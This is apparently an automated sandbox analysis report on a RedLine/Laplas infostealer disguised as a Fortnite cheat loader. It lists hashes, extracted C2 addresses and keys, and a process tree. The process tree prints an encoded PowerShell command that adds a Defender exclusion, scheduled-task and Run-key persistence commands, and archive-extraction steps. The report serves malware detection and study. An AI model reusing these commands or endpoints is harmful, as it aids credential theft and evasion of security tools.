Analysis
-
max time kernel
144s -
max time network
154s -
platform
windows10-2004_x64 -
resource
win10v2004-20230703-en -
resource tags
arch:x64arch:x86image:win10v2004-20230703-enlocale:en-usos:windows10-2004-x64system -
submitted
30-07-2023 21:16
Static task
static1
Behavioral task
behavioral1
Sample
Fortnite cheat/Loader.exe
Resource
win7-20230712-en
Behavioral task
behavioral2
Sample
Fortnite cheat/Loader.exe
Resource
win10-20230703-en
Behavioral task
behavioral3
Sample
Fortnite cheat/Loader.exe
Resource
win10v2004-20230703-en
General
-
Target
Fortnite cheat/Loader.exe
-
Size
252KB
-
MD5
26fc4234f48b5a042bc075a7dcdf760e
-
SHA1
a866e3c4e083de5f7afd5867d41f2100113165f0
-
SHA256
32cd1513e006dda8cf412ccf145e783c89727f3bdb5ac4e5cd0ce235082652e8
-
SHA512
938479455b376252d790630c0ecf050c33f323815c54dde30978c3c2f249976400d339174e7bd07e25336b67b4d9a4a0a3a6dce9e562a8cde552a8c6cba10c12
-
SSDEEP
3072:vcGDkOqcQVyec25qtpaZpeMn9SMoTQnfho6tNI9ByRdq9mxIrG7jxo:vcYao525qtwe1MoTQnfho6m2dq9tS7+
Malware Config
Extracted
redline
@X_Store_support
94.142.138.4:80
-
auth_value
fd77b45902d41987d4650619467a4d55
Extracted
laplas
http://185.209.161.189
-
api_key
f0cd0c3938331a84425c6e784f577ccd87bb667cfdb44cc24f97f402ac5e15b7
Signatures
-
RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
-
Downloads MZ/PE file
-
Checks computer location settings 2 TTPs 2 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-1043950675-1972537973-2972532878-1000\Control Panel\International\Geo\Nation Loader.exe Key value queried \REGISTRY\USER\S-1-5-21-1043950675-1972537973-2972532878-1000\Control Panel\International\Geo\Nation conhost.exe -
Executes dropped EXE 7 IoCs
pid Process 3996 svchost.exe 1964 conhost.exe 4460 7z.exe 3196 7z.exe 2356 7z.exe 3984 4.exe 2760 ntlhost.exe -
Loads dropped DLL 3 IoCs
pid Process 4460 7z.exe 3196 7z.exe 2356 7z.exe -
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
-
Adds Run key to start application 2 TTPs 1 IoCs
description ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-1043950675-1972537973-2972532878-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\NTSystem = "C:\\Users\\Admin\\AppData\\Roaming\\NTSystem\\ntlhost.exe" svchost.exe -
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Legitimate hosting services abused for malware hosting/C2 1 TTPs
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
GoLang User-Agent 1 IoCs
Uses default user-agent string defined by GoLang HTTP packages.
description flow ioc HTTP User-Agent header 64 Go-http-client/1.1 -
Suspicious behavior: EnumeratesProcesses 12 IoCs
pid Process 1384 Loader.exe 1384 Loader.exe 3984 4.exe 1116 powershell.exe 1116 powershell.exe 3984 4.exe 3984 4.exe 3984 4.exe 3984 4.exe 3984 4.exe 3984 4.exe 3984 4.exe -
Suspicious use of AdjustPrivilegeToken 15 IoCs
description pid Process Token: SeDebugPrivilege 1384 Loader.exe Token: SeRestorePrivilege 4460 7z.exe Token: 35 4460 7z.exe Token: SeSecurityPrivilege 4460 7z.exe Token: SeSecurityPrivilege 4460 7z.exe Token: SeRestorePrivilege 3196 7z.exe Token: 35 3196 7z.exe Token: SeSecurityPrivilege 3196 7z.exe Token: SeSecurityPrivilege 3196 7z.exe Token: SeRestorePrivilege 2356 7z.exe Token: 35 2356 7z.exe Token: SeSecurityPrivilege 2356 7z.exe Token: SeSecurityPrivilege 2356 7z.exe Token: SeDebugPrivilege 3984 4.exe Token: SeDebugPrivilege 1116 powershell.exe -
Suspicious use of WriteProcessMemory 34 IoCs
description pid Process procid_target PID 1384 wrote to memory of 3996 1384 Loader.exe 92 PID 1384 wrote to memory of 3996 1384 Loader.exe 92 PID 1384 wrote to memory of 1964 1384 Loader.exe 93 PID 1384 wrote to memory of 1964 1384 Loader.exe 93 PID 1384 wrote to memory of 1964 1384 Loader.exe 93 PID 1964 wrote to memory of 4604 1964 conhost.exe 94 PID 1964 wrote to memory of 4604 1964 conhost.exe 94 PID 4604 wrote to memory of 3312 4604 cmd.exe 96 PID 4604 wrote to memory of 3312 4604 cmd.exe 96 PID 4604 wrote to memory of 4460 4604 cmd.exe 97 PID 4604 wrote to memory of 4460 4604 cmd.exe 97 PID 4604 wrote to memory of 3196 4604 cmd.exe 98 PID 4604 wrote to memory of 3196 4604 cmd.exe 98 PID 4604 wrote to memory of 2356 4604 cmd.exe 99 PID 4604 wrote to memory of 2356 4604 cmd.exe 99 PID 4604 wrote to memory of 2292 4604 cmd.exe 101 PID 4604 wrote to memory of 2292 4604 cmd.exe 101 PID 4604 wrote to memory of 3984 4604 cmd.exe 100 PID 4604 wrote to memory of 3984 4604 cmd.exe 100 PID 4604 wrote to memory of 3984 4604 cmd.exe 100 PID 3984 wrote to memory of 2940 3984 4.exe 103 PID 3984 wrote to memory of 2940 3984 4.exe 103 PID 3984 wrote to memory of 2940 3984 4.exe 103 PID 2940 wrote to memory of 1116 2940 cmd.exe 105 PID 2940 wrote to memory of 1116 2940 cmd.exe 105 PID 2940 wrote to memory of 1116 2940 cmd.exe 105 PID 3984 wrote to memory of 3844 3984 4.exe 107 PID 3984 wrote to memory of 3844 3984 4.exe 107 PID 3984 wrote to memory of 3844 3984 4.exe 107 PID 3984 wrote to memory of 4488 3984 4.exe 109 PID 3984 wrote to memory of 4488 3984 4.exe 109 PID 3984 wrote to memory of 4488 3984 4.exe 109 PID 3996 wrote to memory of 2760 3996 svchost.exe 102 PID 3996 wrote to memory of 2760 3996 svchost.exe 102 -
Views/modifies file attributes 1 TTPs 1 IoCs
pid Process 2292 attrib.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\Fortnite cheat\Loader.exe"C:\Users\Admin\AppData\Local\Temp\Fortnite cheat\Loader.exe"1⤵
- Checks computer location settings
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1384 -
C:\Users\Admin\AppData\Local\Temp\svchost.exe"C:\Users\Admin\AppData\Local\Temp\svchost.exe"2⤵
- Executes dropped EXE
- Adds Run key to start application
- Suspicious use of WriteProcessMemory
PID:3996 -
C:\Users\Admin\AppData\Roaming\NTSystem\ntlhost.exeC:\Users\Admin\AppData\Roaming\NTSystem\ntlhost.exe3⤵
- Executes dropped EXE
PID:2760
-
-
-
C:\Users\Admin\AppData\Local\Temp\conhost.exe"C:\Users\Admin\AppData\Local\Temp\conhost.exe"2⤵
- Checks computer location settings
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:1964 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\main\main.bat" /S"3⤵
- Suspicious use of WriteProcessMemory
PID:4604 -
C:\Windows\system32\mode.commode 65,104⤵PID:3312
-
-
C:\Users\Admin\AppData\Local\Temp\main\7z.exe7z.exe e file.zip -p151971033210090161381766327410 -oextracted4⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of AdjustPrivilegeToken
PID:4460
-
-
C:\Users\Admin\AppData\Local\Temp\main\7z.exe7z.exe e extracted/file_2.zip -oextracted4⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of AdjustPrivilegeToken
PID:3196
-
-
C:\Users\Admin\AppData\Local\Temp\main\7z.exe7z.exe e extracted/file_1.zip -oextracted4⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of AdjustPrivilegeToken
PID:2356
-
-
C:\Users\Admin\AppData\Local\Temp\main\4.exe"4.exe"4⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3984 -
C:\Windows\SysWOW64\cmd.exe"cmd.exe" /C powershell -EncodedCommand "PAAjAHUAZQBSAHMASwBBACMAPgAgAEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAA8ACMAUgA4AGoAbwBuAE0AMABaACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGQAQwBZAHMAeAAjAD4AIAAtAEYAbwByAGMAZQAgADwAIwBkAGQAWgBLAHcAbgAjAD4A" & powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0 & powercfg /hibernate off5⤵
- Suspicious use of WriteProcessMemory
PID:2940 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -EncodedCommand "PAAjAHUAZQBSAHMASwBBACMAPgAgAEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAA8ACMAUgA4AGoAbwBuAE0AMABaACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGQAQwBZAHMAeAAjAD4AIAAtAEYAbwByAGMAZQAgADwAIwBkAGQAWgBLAHcAbgAjAD4A"6⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1116
-
-
-
C:\Windows\SysWOW64\cmd.exe"cmd.exe" /c SCHTASKS /CREATE /SC MINUTE /MO 5 /TN "dllhost" /TR "C:\ProgramData\Dllhost\dllhost.exe"5⤵PID:3844
-
-
C:\Windows\SysWOW64\cmd.exe"cmd.exe" /c SCHTASKS /CREATE /SC HOURLY /TN "NvStray\NvStrayService_bk9117" /TR "C:\ProgramData\Dllhost\dllhost.exe"5⤵PID:4488
-
-
-
C:\Windows\system32\attrib.exeattrib +H "4.exe"4⤵
- Views/modifies file attributes
PID:2292
-
-
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
Filesize
2.5MB
MD56736c0e1179296ff6dfa0191ac874c7a
SHA189566e42fb866eecf5e8282b967461299ab7a08c
SHA256c60ecd5714a23a727d9749652883ec95bcdb350b9f278c34ac504edb898073e4
SHA51285791acbc9d538b92ac3c10a5ee87638ee0d9dd0323aa1eaf38c1c055e4312e5722f6b07e3f450c00cd595123a9981815a8ca972432749ee830852a76177125c
-
Filesize
2.5MB
MD56736c0e1179296ff6dfa0191ac874c7a
SHA189566e42fb866eecf5e8282b967461299ab7a08c
SHA256c60ecd5714a23a727d9749652883ec95bcdb350b9f278c34ac504edb898073e4
SHA51285791acbc9d538b92ac3c10a5ee87638ee0d9dd0323aa1eaf38c1c055e4312e5722f6b07e3f450c00cd595123a9981815a8ca972432749ee830852a76177125c
-
Filesize
2.5MB
MD56736c0e1179296ff6dfa0191ac874c7a
SHA189566e42fb866eecf5e8282b967461299ab7a08c
SHA256c60ecd5714a23a727d9749652883ec95bcdb350b9f278c34ac504edb898073e4
SHA51285791acbc9d538b92ac3c10a5ee87638ee0d9dd0323aa1eaf38c1c055e4312e5722f6b07e3f450c00cd595123a9981815a8ca972432749ee830852a76177125c
-
Filesize
21KB
MD5a761e93d5993567d382af163745760ad
SHA127bd150490cd443a60bb70fa8b83299d75e02779
SHA2561edbffa93edd8b72a352aec6bbf6cd36b1045b26b8dfa141b10067aaddc8d6e1
SHA512c9e4d46a747e02b7f387d6551f2d26ce847e66a69b8a8bddb276a83388b367f2fa28153402d5f274a81fcc260840afc043c4b853dd06d87125980a49934f14fa
-
Filesize
1.6MB
MD572491c7b87a7c2dd350b727444f13bb4
SHA11e9338d56db7ded386878eab7bb44b8934ab1bc7
SHA25634ad9bb80fe8bf28171e671228eb5b64a55caa388c31cb8c0df77c0136735891
SHA512583d0859d29145dfc48287c5a1b459e5db4e939624bd549ff02c61eae8a0f31fc96a509f3e146200cdd4c93b154123e5adfbfe01f7d172db33968155189b5511
-
Filesize
1.6MB
MD572491c7b87a7c2dd350b727444f13bb4
SHA11e9338d56db7ded386878eab7bb44b8934ab1bc7
SHA25634ad9bb80fe8bf28171e671228eb5b64a55caa388c31cb8c0df77c0136735891
SHA512583d0859d29145dfc48287c5a1b459e5db4e939624bd549ff02c61eae8a0f31fc96a509f3e146200cdd4c93b154123e5adfbfe01f7d172db33968155189b5511
-
Filesize
1.6MB
MD572491c7b87a7c2dd350b727444f13bb4
SHA11e9338d56db7ded386878eab7bb44b8934ab1bc7
SHA25634ad9bb80fe8bf28171e671228eb5b64a55caa388c31cb8c0df77c0136735891
SHA512583d0859d29145dfc48287c5a1b459e5db4e939624bd549ff02c61eae8a0f31fc96a509f3e146200cdd4c93b154123e5adfbfe01f7d172db33968155189b5511
-
Filesize
1.6MB
MD572491c7b87a7c2dd350b727444f13bb4
SHA11e9338d56db7ded386878eab7bb44b8934ab1bc7
SHA25634ad9bb80fe8bf28171e671228eb5b64a55caa388c31cb8c0df77c0136735891
SHA512583d0859d29145dfc48287c5a1b459e5db4e939624bd549ff02c61eae8a0f31fc96a509f3e146200cdd4c93b154123e5adfbfe01f7d172db33968155189b5511
-
Filesize
458KB
MD5619f7135621b50fd1900ff24aade1524
SHA16c7ea8bbd435163ae3945cbef30ef6b9872a4591
SHA256344f076bb1211cb02eca9e5ed2c0ce59bcf74ccbc749ec611538fa14ecb9aad2
SHA5122c7293c084d09bc2e3ae2d066dd7b331c810d9e2eeca8b236a8e87fdeb18e877b948747d3491fcaff245816507685250bd35f984c67a43b29b0ae31ecb2bd628
-
Filesize
458KB
MD5619f7135621b50fd1900ff24aade1524
SHA16c7ea8bbd435163ae3945cbef30ef6b9872a4591
SHA256344f076bb1211cb02eca9e5ed2c0ce59bcf74ccbc749ec611538fa14ecb9aad2
SHA5122c7293c084d09bc2e3ae2d066dd7b331c810d9e2eeca8b236a8e87fdeb18e877b948747d3491fcaff245816507685250bd35f984c67a43b29b0ae31ecb2bd628
-
Filesize
458KB
MD5619f7135621b50fd1900ff24aade1524
SHA16c7ea8bbd435163ae3945cbef30ef6b9872a4591
SHA256344f076bb1211cb02eca9e5ed2c0ce59bcf74ccbc749ec611538fa14ecb9aad2
SHA5122c7293c084d09bc2e3ae2d066dd7b331c810d9e2eeca8b236a8e87fdeb18e877b948747d3491fcaff245816507685250bd35f984c67a43b29b0ae31ecb2bd628
-
Filesize
458KB
MD5619f7135621b50fd1900ff24aade1524
SHA16c7ea8bbd435163ae3945cbef30ef6b9872a4591
SHA256344f076bb1211cb02eca9e5ed2c0ce59bcf74ccbc749ec611538fa14ecb9aad2
SHA5122c7293c084d09bc2e3ae2d066dd7b331c810d9e2eeca8b236a8e87fdeb18e877b948747d3491fcaff245816507685250bd35f984c67a43b29b0ae31ecb2bd628
-
Filesize
21KB
MD5a761e93d5993567d382af163745760ad
SHA127bd150490cd443a60bb70fa8b83299d75e02779
SHA2561edbffa93edd8b72a352aec6bbf6cd36b1045b26b8dfa141b10067aaddc8d6e1
SHA512c9e4d46a747e02b7f387d6551f2d26ce847e66a69b8a8bddb276a83388b367f2fa28153402d5f274a81fcc260840afc043c4b853dd06d87125980a49934f14fa
-
Filesize
2.1MB
MD54762f0b6652250641a06e2029d6dda23
SHA1bfa7925486f951f729b3ce47caa6ff52330420ad
SHA2561e9654f0b077cfb8c393cb6cfd3d2b7918d87d56eaaf14f8523a582343d13b4e
SHA51233227e64cc34f7e591f6a26b6eaef2f2b4369050e5a2c544413b8f8264114083a93fa70911810c19390ed3d1724bd73c135a2acf11f12f70892f20609593c72d
-
Filesize
9KB
MD5018ccdb718d3ad7641fecfdad0fbeb4e
SHA146cdffdea8e44b455873659a35dcd973364a84dd
SHA256708b3379e029aafb112f890a6ae10f2a4eebe52eef991d2d6136a11fe84143b5
SHA512dcd1494429ced81dfbcc83cb8c87d4cd42719d53918834e16691c0d068631ae39fe0381c668e92341a5cdccf75877c2af3ae81c66b6d37e4b149f68a06ab2803
-
Filesize
1.5MB
MD5270d4612657b69eda3ebbb1207fc8cd7
SHA1e023ff99c13c056fa7f80b55dc12f1d02df92114
SHA25683b0eb7eee4c982f034d53b7541758fac699956433baeedf9b8f4494e367b5e7
SHA5126fe46a7dd1fc6930646e3ba08306e1cfe826dcba6b7e3af1c9439157f35919739940e1d8143c6abecfa83f6b92d324764dfa8ca54dca91250b849c2cd138e6fe
-
Filesize
1.5MB
MD57cebec977eb671d25c4160ee75cbf124
SHA1e09e0e906834b7f2ec270ba589a01e455ebdf0d1
SHA256f0e78c63d52116f121709480935013c26a99bd85ba6bfd5100bc5e4411c7178e
SHA512b79c8d6d4c947fdee755ef81c5c36d657ca1b4030c8f90f906961a22968c98d8fb6e33302191c28135c2593598876b6921f766270a50063754927b4404c798d1
-
Filesize
436B
MD57f4c4965a2f78d6de87d304fdd355abf
SHA187a05c16753a036126677fe53118c07d36c0e671
SHA256ed489607187114988306637dae2b81eff225315a8a8ee221249d14430f264fdb
SHA51241c949862477065b8f537670b6747074c9e543753812fcb28b02be12b1bbf0fb8b9473ea0859fb1450fee848d62d4c70249d09f48a5e5eac15eb510b70b3f741
-
Filesize
4.0MB
MD5d076c4b5f5c42b44d583c534f78adbe7
SHA1c35478e67d490145520be73277cd72cd4e837090
SHA2562c63c61e0adaaf669c9c674edfc9081d415c05b834611944a682f120ab9559d8
SHA512b2dfcf98695e7e40578f02a104a1c2fa1de29d13b0056d3dc4a5689168546f437bfd6acbc99e3766f94efb01bac5c908f3e80795f017e1629c97b6b1026ce638
-
Filesize
4.0MB
MD5d076c4b5f5c42b44d583c534f78adbe7
SHA1c35478e67d490145520be73277cd72cd4e837090
SHA2562c63c61e0adaaf669c9c674edfc9081d415c05b834611944a682f120ab9559d8
SHA512b2dfcf98695e7e40578f02a104a1c2fa1de29d13b0056d3dc4a5689168546f437bfd6acbc99e3766f94efb01bac5c908f3e80795f017e1629c97b6b1026ce638
-
Filesize
4.0MB
MD5d076c4b5f5c42b44d583c534f78adbe7
SHA1c35478e67d490145520be73277cd72cd4e837090
SHA2562c63c61e0adaaf669c9c674edfc9081d415c05b834611944a682f120ab9559d8
SHA512b2dfcf98695e7e40578f02a104a1c2fa1de29d13b0056d3dc4a5689168546f437bfd6acbc99e3766f94efb01bac5c908f3e80795f017e1629c97b6b1026ce638
-
Filesize
798.0MB
MD54e804011c3dcec331cefe2c076de5efa
SHA16163b50b7181202dceb2fd2ae1520200de0357f4
SHA256a75f608e75c60d490e1d4c45b1b54c8f7c675de4ba00baac947be68d6d6da947
SHA51293a9957e5cb30c7ed700d70789c89c6de759330788f0e151295c87fddad5b4af6dbf1265c230e0eebc443d01ab9f267fd74868996d579c9ad41fac2e703d5a43
-
Filesize
798.0MB
MD54e804011c3dcec331cefe2c076de5efa
SHA16163b50b7181202dceb2fd2ae1520200de0357f4
SHA256a75f608e75c60d490e1d4c45b1b54c8f7c675de4ba00baac947be68d6d6da947
SHA51293a9957e5cb30c7ed700d70789c89c6de759330788f0e151295c87fddad5b4af6dbf1265c230e0eebc443d01ab9f267fd74868996d579c9ad41fac2e703d5a43